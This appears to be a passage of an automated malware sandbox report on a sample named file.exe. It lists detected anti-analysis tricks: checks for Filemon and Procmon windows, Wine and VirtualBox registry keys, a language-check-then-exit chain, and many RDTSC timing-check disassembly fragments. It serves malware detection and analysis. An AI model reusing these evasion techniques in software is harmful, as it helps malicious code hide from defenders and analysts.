                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E29BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E29BB0

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-37532
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FE022 second address: 10FE034 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8ED0C920C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F8ED0C920C6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127BCA6 second address: 127BCAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128124D second address: 1281255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1281255 second address: 1281259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1281259 second address: 128125F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128125F second address: 1281271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F8ED0E3C3DCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1281271 second address: 1281275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12814EE second address: 1281516 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3DEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8ED0E3C3E6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1281516 second address: 128151C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128151C second address: 128152F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jnl 00007F8ED0E3C3D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128152F second address: 1281539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1281539 second address: 128153E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12832B2 second address: 12832CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F8ED0C920C6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f je 00007F8ED0C920D4h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12832CB second address: 12832CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128335F second address: 128337E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push 58C969BAh 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F8ED0C920CCh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128337E second address: 12833CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8ED0E3C3E8h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 58C9693Ah 0x00000012 mov si, 1B11h 0x00000016 push 00000003h 0x00000018 mov esi, dword ptr [ebp+122D3613h] 0x0000001e push 00000000h 0x00000020 mov si, bx 0x00000023 push 00000003h 0x00000025 call 00007F8ED0E3C3D9h 0x0000002a jbe 00007F8ED0E3C3E4h 0x00000030 pushad 0x00000031 jg 00007F8ED0E3C3D6h 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12833CE second address: 12833DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12833DB second address: 12833E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1295AAD second address: 1295AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1295AB5 second address: 1295AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1295AB9 second address: 1295ABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1271D13 second address: 1271D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1271D19 second address: 1271D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8ED0C920D4h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A4445 second address: 12A4449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A474D second address: 12A4753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A4753 second address: 12A4757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A4757 second address: 12A475F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A4DF4 second address: 12A4E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8ED0E3C3E3h 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A5103 second address: 12A5107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A5107 second address: 12A512A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8ED0E3C3E9h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A512A second address: 12A5160 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920CEh 0x00000007 jo 00007F8ED0C920C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F8ED0C920D9h 0x00000014 popad 0x00000015 push edx 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A5160 second address: 12A5166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A5166 second address: 12A5172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A52C5 second address: 12A52DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A52DD second address: 12A52E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A52E3 second address: 12A52E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A52E9 second address: 12A52ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A52ED second address: 12A5309 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F8ED0E3C3DCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1276D4C second address: 1276D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1276D50 second address: 1276D7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F8ED0E3C3F0h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1276D7E second address: 1276D82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A5A01 second address: 12A5A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A5A07 second address: 12A5A12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A612D second address: 12A6143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jl 00007F8ED0E3C3D6h 0x0000000f jno 00007F8ED0E3C3D6h 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A8705 second address: 12A870A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A870A second address: 12A872F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8ED0E3C3EDh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A872F second address: 12A8733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AC746 second address: 12AC74C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AC840 second address: 12AC846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127524C second address: 1275282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007F8ED0E3C3D6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e jmp 00007F8ED0E3C3E2h 0x00000013 jmp 00007F8ED0E3C3E4h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1E27 second address: 12B1E2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1E2B second address: 12B1E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1E31 second address: 12B1E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F8ED0C920DBh 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 jmp 00007F8ED0C920D8h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1E72 second address: 12B1E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1E76 second address: 12B1E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1FFE second address: 12B2002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B2002 second address: 12B2016 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8ED0C920C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F8ED0C920CEh 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B2892 second address: 12B2898 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B2898 second address: 12B28B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B3F62 second address: 12B3FE2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007F8ED0E3C405h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 je 00007F8ED0E3C3E8h 0x0000001a jmp 00007F8ED0E3C3E2h 0x0000001f jmp 00007F8ED0E3C3E1h 0x00000024 popad 0x00000025 mov eax, dword ptr [eax] 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F8ED0E3C3DEh 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B3FE2 second address: 12B3FEC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B4353 second address: 12B4358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B4553 second address: 12B455D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8ED0C920CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B4AC8 second address: 12B4AF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c mov edi, 22159214h 0x00000011 nop 0x00000012 jc 00007F8ED0E3C3DAh 0x00000018 push eax 0x00000019 push eax 0x0000001a pop eax 0x0000001b pop eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B4D93 second address: 12B4D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B4D97 second address: 12B4D9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B50C7 second address: 12B50D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B5F3A second address: 12B5F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B5F3E second address: 12B5F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B8727 second address: 12B8739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8ED0E3C3DEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B8739 second address: 12B879D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F8ED0C920C8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov esi, ecx 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007F8ED0C920C8h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 movsx esi, cx 0x00000046 xchg eax, ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a jnl 00007F8ED0C920C6h 0x00000050 ja 00007F8ED0C920C6h 0x00000056 popad 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B879D second address: 12B87A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B7A4A second address: 12B7A50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B87A3 second address: 12B87A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B7A50 second address: 12B7A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B87A7 second address: 12B87C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8ED0E3C3E5h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B917E second address: 12B9193 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B9B06 second address: 12B9B10 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8ED0E3C3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B9B10 second address: 12B9B17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BC2B6 second address: 12BC2D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3E5h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BC2D8 second address: 12BC2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BC2DE second address: 12BC2E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BC2E2 second address: 12BC2E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BC2E6 second address: 12BC2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007F8ED0E3C3D6h 0x0000000f jnc 00007F8ED0E3C3D6h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BC2FC second address: 12BC313 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8ED0C920D2h 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BC313 second address: 12BC319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1269572 second address: 1269576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1269576 second address: 126958B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3E1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126958B second address: 12695AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8ED0C920CCh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8ED0C920CBh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12695AD second address: 12695B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C08A0 second address: 12C08A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C1856 second address: 12C185A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C185A second address: 12C185E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
